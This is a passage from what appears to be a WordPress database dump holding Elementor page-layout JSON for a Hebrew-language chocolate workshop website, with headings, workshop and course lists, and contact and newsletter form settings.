\\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4058fdb2\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"778b3676\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37eaf375\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61dc30dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"31a67108\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3bf2db\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"5122f9c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"63f9b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61739365\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"377296c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"a673372\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"40017cec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23388368\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(305,78,'_elementor_version','0.4'),(310,69,'_elementor_template_type','wp-post'),(311,80,'_wp_page_template','elementor_canvas'),(312,80,'_elementor_edit_mode','builder'),(313,80,'_elementor_data','[{\"id\":\"700950a2\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"20a86e96\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"62b3fe8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f67ac3a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"1abed8db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5569e669\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4058fdb2\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"778b3676\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37eaf375\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61dc30dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"31a67108\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3bf2db\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"5122f9c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"63f9b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd 